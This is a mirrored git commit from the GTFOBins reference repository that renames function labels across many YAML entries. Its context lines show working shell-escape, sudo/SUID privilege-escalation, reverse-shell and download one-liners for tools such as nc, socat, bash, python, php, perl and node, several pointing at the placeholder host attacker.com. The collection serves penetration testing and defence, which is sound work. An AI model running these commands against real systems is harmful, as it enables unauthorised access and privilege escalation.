mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Reorganize function names
This commit is contained in:
parent
2d3ebbbb05
commit
36dcf7a836
@ -1,9 +1,9 @@
|
|||||||
exec-interactive:
|
execute-interactive:
|
||||||
label: Interactive
|
label: Interactive execute
|
||||||
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
description: It executes interactive commands that may be exploited to break out from restricted shells.
|
||||||
|
|
||||||
exec-non-interactive:
|
execute-non-interactive:
|
||||||
label: Non-interactive
|
label: Non-interactive execute
|
||||||
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
description: It executes non-interactive commands that may be exploited to break out from restricted shells.
|
||||||
|
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
@ -26,18 +26,14 @@ upload:
|
|||||||
label: Upload
|
label: Upload
|
||||||
description: It can exfiltrate files on the network.
|
description: It can exfiltrate files on the network.
|
||||||
|
|
||||||
bind-shell:
|
bind-shell-interactive:
|
||||||
label: Bind shell
|
label: Interactive bind shell
|
||||||
description: It can bind a shell to a local port to allow remote network access.
|
description: It can bind a shell to a local port to allow remote network access.
|
||||||
|
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
label: Reverse shell
|
label: Interactive reverse shell
|
||||||
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
description: It can send back a reverse shell to a listening attacker to open a remote network access.
|
||||||
|
|
||||||
load-library:
|
|
||||||
label: Library load
|
|
||||||
description: It loads shared libraries that may be used to run code in the binary execution context.
|
|
||||||
|
|
||||||
bind-shell-non-interactive:
|
bind-shell-non-interactive:
|
||||||
label: Non-interactive bind shell
|
label: Non-interactive bind shell
|
||||||
description: It can bind a non-interactive shell to a local port to allow remote network access.
|
description: It can bind a non-interactive shell to a local port to allow remote network access.
|
||||||
@ -45,3 +41,7 @@ bind-shell-non-interactive:
|
|||||||
reverse-shell-non-interactive:
|
reverse-shell-non-interactive:
|
||||||
label: Non-interactive reverse shell
|
label: Non-interactive reverse shell
|
||||||
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
|
description: It can send back a non-interactive reverse shell to a listening attacker to open a remote network access.
|
||||||
|
|
||||||
|
load-library:
|
||||||
|
label: Library load
|
||||||
|
description: It loads shared libraries that may be used to run code in the binary execution context.
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: ash
|
- code: ash
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo ash
|
- code: sudo ash
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: awk 'BEGIN {system("/bin/sh")}'
|
- code: awk 'BEGIN {system("/bin/sh")}'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
- code: sudo awk 'BEGIN {system("/bin/sh")}'
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: bash
|
- code: bash
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo bash
|
- code: sudo bash
|
||||||
@ -34,7 +34,7 @@ functions:
|
|||||||
export RPORT=12345
|
export RPORT=12345
|
||||||
export LFILE=file_to_get
|
export LFILE=file_to_get
|
||||||
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
bash -c 'cat < /dev/tcp/$RHOST/$RPORT > $LFILE'
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: csh
|
- code: csh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo csh
|
- code: sudo csh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: dash
|
- code: dash
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo dash
|
- code: sudo dash
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
ed
|
ed
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
- code: emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
- code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: env /bin/sh
|
- code: env /bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo env /bin/sh
|
- code: sudo env /bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: expect -c 'spawn /bin/sh;interact'
|
- code: expect -c 'spawn /bin/sh;interact'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo expect -c 'spawn /bin/sh;interact'
|
- code: sudo expect -c 'spawn /bin/sh;interact'
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: find . -exec /bin/sh \; -quit
|
- code: find . -exec /bin/sh \; -quit
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo find . -exec /bin/sh \; -quit
|
- code: sudo find . -exec /bin/sh \; -quit
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
ftp
|
ftp
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: gdb -nx -ex '!sh' -ex quit
|
- code: gdb -nx -ex '!sh' -ex quit
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: ionice /bin/sh
|
- code: ionice /bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo ionice /bin/sh
|
- code: sudo ionice /bin/sh
|
||||||
|
@ -7,7 +7,7 @@ description: |
|
|||||||
/lib64/ld-linux-x86-64.so.2
|
/lib64/ld-linux-x86-64.so.2
|
||||||
```
|
```
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: /lib/ld.so /bin/sh
|
- code: /lib/ld.so /bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo /lib/ld.so /bin/sh
|
- code: sudo /lib/ld.so /bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
less /etc/profile
|
less /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
man man
|
man man
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
TERM= more /etc/profile
|
TERM= more /etc/profile
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
|
@ -14,13 +14,13 @@ functions:
|
|||||||
LPORT=12345
|
LPORT=12345
|
||||||
LFILE=where_to_save
|
LFILE=where_to_save
|
||||||
nc -l -p $LPORT > "$LFILE"
|
nc -l -p $LPORT > "$LFILE"
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
nc -e /bin/sh $RHOST $RPORT
|
nc -e /bin/sh $RHOST $RPORT
|
||||||
bind-shell:
|
bind-shell-interactive:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
@ -9,7 +9,7 @@ functions:
|
|||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: |
|
- code: |
|
||||||
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});'
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
@ -20,7 +20,7 @@ functions:
|
|||||||
sh.stdout.pipe(this);
|
sh.stdout.pipe(this);
|
||||||
sh.stderr.pipe(this);
|
sh.stderr.pipe(this);
|
||||||
});'
|
});'
|
||||||
bind-shell:
|
bind-shell-interactive:
|
||||||
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
- description: Run `nc target.com 12345` on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
export LPORT=12345
|
export LPORT=12345
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: perl -e 'exec "/bin/sh";'
|
- code: perl -e 'exec "/bin/sh";'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo perl -e 'exec "/bin/sh";'
|
- code: sudo perl -e 'exec "/bin/sh";'
|
||||||
suid-enabled:
|
suid-enabled:
|
||||||
- code: ./perl -e 'exec "/bin/sh";'
|
- code: ./perl -e 'exec "/bin/sh";'
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-non-interactive:
|
execute-non-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
export CMD="ls /"
|
export CMD="ls /"
|
||||||
php -r 'system(getenv("CMD"));'
|
php -r 'system(getenv("CMD"));'
|
||||||
@ -39,7 +39,7 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: python2 -c 'import os; os.system("/bin/sh")'
|
- code: python2 -c 'import os; os.system("/bin/sh")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
- code: sudo python2 -c 'import os; os.system("/bin/sh")'
|
||||||
@ -22,7 +22,7 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: python3 -c 'import os; os.system("/bin/sh")'
|
- code: python3 -c 'import os; os.system("/bin/sh")'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
- code: sudo python3 -c 'import os; os.system("/bin/sh")'
|
||||||
@ -22,7 +22,7 @@ functions:
|
|||||||
export URL=http://attacker.com/file_to_get
|
export URL=http://attacker.com/file_to_get
|
||||||
export LFILE=where_to_save
|
export LFILE=where_to_save
|
||||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: ruby -e 'exec "/bin/sh"'
|
- code: ruby -e 'exec "/bin/sh"'
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo ruby -e 'exec "/bin/sh"'
|
- code: sudo ruby -e 'exec "/bin/sh"'
|
||||||
@ -9,7 +9,7 @@ functions:
|
|||||||
code: |
|
code: |
|
||||||
export LPORT=8888
|
export LPORT=8888
|
||||||
ruby -run -e httpd . -p $LPORT
|
ruby -run -e httpd . -p $LPORT
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
export RHOST=attacker.com
|
export RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-non-interactive:
|
execute-non-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
TF=$(mktemp)
|
TF=$(mktemp)
|
||||||
CMD="id"
|
CMD="id"
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: setarch $(arch) /bin/sh
|
- code: setarch $(arch) /bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo setarch $(arch) /bin/sh
|
- code: sudo setarch $(arch) /bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
HOST=user@attacker.com
|
HOST=user@attacker.com
|
||||||
sftp $HOST
|
sftp $HOST
|
||||||
|
@ -1,12 +1,12 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
- description: Run <code>socat file:`tty`,raw,echo=0 tcp-listen:12345</code> on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
RPORT=12345
|
RPORT=12345
|
||||||
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
|
||||||
bind-shell:
|
bind-shell-interactive:
|
||||||
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
- description: Run <code>socat FILE:`tty`,raw,echo=0 TCP:target.com:12345</code> on the attacker box to connect to the shell.
|
||||||
code: |
|
code: |
|
||||||
LPORT=12345
|
LPORT=12345
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- description: Reconnecting may help bypassing restricted shells.
|
- description: Reconnecting may help bypassing restricted shells.
|
||||||
code: ssh localhost /bin/bash --noprofile --norc
|
code: ssh localhost /bin/bash --noprofile --norc
|
||||||
download:
|
download:
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: strace -o /dev/null /bin/sh
|
- code: strace -o /dev/null /bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo strace -o /dev/null /bin/sh
|
- code: sudo strace -o /dev/null /bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: taskset 1 /bin/sh
|
- code: taskset 1 /bin/sh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo taskset 1 /bin/sh
|
- code: sudo taskset 1 /bin/sh
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
tclsh
|
tclsh
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- description: BSD version only. Needs to be connected first.
|
- description: BSD version only. Needs to be connected first.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
@ -8,7 +8,7 @@ functions:
|
|||||||
telnet $RHOST $RPORT
|
telnet $RHOST $RPORT
|
||||||
^]
|
^]
|
||||||
!/bin/sh
|
!/bin/sh
|
||||||
reverse-shell:
|
reverse-shell-interactive:
|
||||||
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
|
||||||
code: |
|
code: |
|
||||||
RHOST=attacker.com
|
RHOST=attacker.com
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: vi -c ':!/bin/sh'
|
- code: vi -c ':!/bin/sh'
|
||||||
- code: |
|
- code: |
|
||||||
vi
|
vi
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: |
|
- code: |
|
||||||
wish
|
wish
|
||||||
exec /bin/sh <@stdin >@stdout 2>@stderr
|
exec /bin/sh <@stdin >@stdout 2>@stderr
|
||||||
|
@ -1,6 +1,6 @@
|
|||||||
---
|
---
|
||||||
functions:
|
functions:
|
||||||
exec-interactive:
|
execute-interactive:
|
||||||
- code: zsh
|
- code: zsh
|
||||||
sudo-enabled:
|
sudo-enabled:
|
||||||
- code: sudo zsh
|
- code: sudo zsh
|
||||||
|
Loading…
Reference in New Issue
Block a user